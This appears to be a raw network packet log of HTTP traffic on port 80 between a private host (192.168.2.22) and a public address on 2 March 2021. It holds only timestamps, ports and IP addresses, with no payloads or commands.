Mar 2, 2021 20:23:38.655692101 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.655704021 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.655797005 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.656465054 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.656486988 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.656507969 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.656543016 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.657298088 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.657320023 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.657337904 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.657373905 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.658093929 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.658117056 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.658133984 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.658149958 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.658170938 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.658901930 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.658926010 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.658941031 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.659003019 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.659020901 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.659693003 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.659723997 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.659746885 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.659794092 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.660197973 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.660393000 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.660495043 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.660516024 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.660531998 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.660561085 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.660579920 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.661326885 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.661359072 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.661377907 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.661465883 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.662106991 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.662128925 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.662148952 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.662198067 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.663537025 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663559914 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663577080 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663639069 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.663660049 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.663721085 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663742065 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663758039 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.663789988 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.706631899 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.706662893 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.706679106 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.706696033 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.706712008 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.706784010 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.707729101 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707756996 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707776070 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707792997 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707793951 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.707809925 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707839012 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.707855940 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.707890034 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707909107 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707926035 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707945108 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707956076 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.707963943 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.707989931 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.708762884 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.708786964 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.708803892 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.708821058 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.708837032 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.708848000 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.708865881 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.708878994 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.709686041 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.709707022 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.709722042 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.709738016 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.709753990 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.709796906 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.709810019 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.710611105 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.710634947 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.710650921 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.710666895 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.710683107 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.710720062 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.710741997 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.711486101 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.711508989 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.711529016 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.711545944 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.711561918 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.711574078 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.711596966 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.712404013 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.712424994 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.712441921 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.712460041 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.712480068 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.712506056 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.712661028 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.713287115 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.713310003 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.713325977 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.713345051 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.713362932 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.713378906 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.713414907 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.714194059 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.714221954 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.714240074 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.714257002 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.714273930 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.714289904 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.714308977 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.715089083 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.715112925 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.715127945 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.715143919 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.715161085 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.715188026 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.715204000 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.716006994 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716029882 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716042042 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716053963 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716069937 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716150999 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.716885090 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716907024 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716924906 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716941118 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716957092 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.716980934 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.716995001 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.717802048 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.717824936 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.717839956 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.717859030 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.717876911 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.717895031 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.717911959 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.718724966 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.718771935 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.718789101 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.718830109 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.718852043 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.719223976 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.719244957 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.719261885 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.719278097 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.719294071 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.719360113 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.719381094 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.720215082 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.720237970 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.720254898 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.720274925 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.720288992 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.720293999 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.720330000 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.721049070 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721074104 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721090078 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721107006 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721123934 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721139908 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.721155882 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.721254110 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.721962929 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.721988916 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722007036 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722023010 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722039938 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722047091 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.722110987 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.722855091 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722879887 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722897053 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722912073 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722928047 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.722964048 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.723751068 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.723773003 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.723787069 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.723792076 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.723803997 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.723809958 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.723825932 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.723835945 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.723862886 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.724663973 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.724685907 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.724704027 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.724720955 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.724735975 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.724752903 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.724773884 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.725589037 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.725610971 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.725630999 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.725646973 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.725663900 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.725684881 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.725703001 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.726466894 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.726489067 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.726505041 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.726525068 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.726541996 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.726552010 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.726568937 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.727380037 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.727405071 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.727421999 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.727493048 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.744725943 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.744754076 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.744770050 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.744790077 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.744807005 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.744836092 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.744863033 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.745116949 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.745137930 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.745152950 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.745172977 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.745187998 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.745191097 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.745227098 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.746038914 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746062994 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746079922 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746097088 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746109962 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.746113062 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746129036 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.746170998 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.746968031 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.746990919 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747008085 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747024059 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747040033 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747055054 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.747077942 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.747834921 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747859001 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747879028 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747895956 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747911930 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.747941971 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.748744011 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.748770952 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.748786926 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.748795033 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.748807907 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.748822927 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.748826981 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.748828888 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.748871088 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.749639034 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.749664068 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.749681950 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.749697924 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.749710083 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.749715090 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.749737978 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.750600100 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.750622034 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.750633955 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.750646114 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.750667095 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.750720024 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.751482010 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.751514912 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.751533031 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.751549006 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.751559973 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.751566887 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.751573086 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.751620054 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.752423048 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.752445936 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.752460957 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.752476931 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.752495050 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.752510071 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.752532005 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.753304958 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.753328085 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.753345013 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.753360987 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.753375053 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.753376961 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.753391027 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.753447056 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.754168034 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.754190922 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.754211903 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.754230022 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.754245043 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.754259109 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.754276991 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.755063057 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.755084991 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.755100965 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.755117893 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.755129099 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.755136967 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.755152941 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.755182028 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.755999088 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756021023 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756041050 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756083965 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.756488085 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756508112 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756524086 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756540060 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.756572008 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.756592989 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.756870985 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757426023 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757447004 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757463932 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757479906 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757498026 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.757500887 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.757810116 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.757822990 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.758335114 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.758358955 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.758378029 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.758394003 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.758409977 CET	80	49176	104.21.59.148	192.168.2.22
